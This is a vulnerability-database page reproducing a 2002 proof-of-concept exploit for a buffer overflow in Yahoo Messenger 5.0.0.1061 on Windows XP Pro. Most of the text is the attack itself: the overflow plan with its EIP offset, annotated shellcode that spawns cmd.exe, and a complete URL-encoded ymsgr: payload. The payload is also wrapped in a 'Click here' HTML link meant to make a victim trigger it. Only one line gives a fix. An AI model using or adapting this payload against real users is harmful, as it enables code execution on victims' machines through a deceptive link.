Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ymxp.txt

🗓️ 03 Jun 2002 00:00:00Reported by skType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Buffer overflow exploit for Yahoo Messenger that spawns command prompt on Windows XP Pro.

Code
`Yahoo! Messenger (5,0,0,1061) Buffer Overflow Exploit for Win XP Pro  
  
  
  
  
  
Intro:  
Proof of concept code for YM Buffer Overflow as discovered in:  
http://packetstorm.decepticons.org/advisories/misc/yahoo-im.txt  
  
  
  
  
  
Code flow:  
Overwrite EIP at 218  
Point EIP to a "RET" in the memory  
"RET" jumps to beginning of shellcode  
Shellcode spawns cmd.exe  
Terminate YM gracefully :)  
  
  
  
  
  
'shellcode':  
  
55 push ebp  
54 push esp  
5D pop ebp  
33 FF xor edi,edi  
57 push edi  
C6 45 FC 63 mov byte ptr [ebp-04h],'c'  
C6 45 FD 6D mov byte ptr [ebp-03h],'m'  
C6 45 FE 64 mov byte ptr [ebp-02h],'d'  
57 push edi  
C6 45 F8 03 mov byte ptr[ebp-08h],3 ;Max window  
8D 45 FC lea eax,[ebp-4h]  
50 push eax  
B8 7E684C67 mov eax,7E684C67h ;CreateProcess@77E684C6h  
C1 C8 04 ror eax, 4  
FF D0 call eax  
B8 7EB854B7 mov eax,7EB854B7h ;FatalExit@77EB854Bh  
C1 C8 04 ror eax, 4  
FF D0 call eax  
  
  
  
  
  
Test:  
Parse this to your IE browser  
ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77  
  
Or put this into an HTML file  
<a href="ymsgr:call?%55%54%5D%33%FF%57%C6%45%FC%63%C6%45%FD%6D%C6%45%FE%64%57%C6%45%F8%03%8D%45%FC%50%B8%67%4C%68%7E%C1%C8%04%FF%D0%B8%B7%54%B8%7E%C1%C8%04%FF%D0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%e2%1e%e7%77">Click here</a>  
  
  
  
  
  
Fix:  
Update YM at http://messenger.yahoo.com/  
  
  
  
  
Credit:  
[email protected]  
31 May 2002  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Jun 2002 00:00Current
7.4High risk
Vulners AI Score7.4
buffer overflow exploityahoo messengerwindows xp procommand promptshellcodeupdate required
24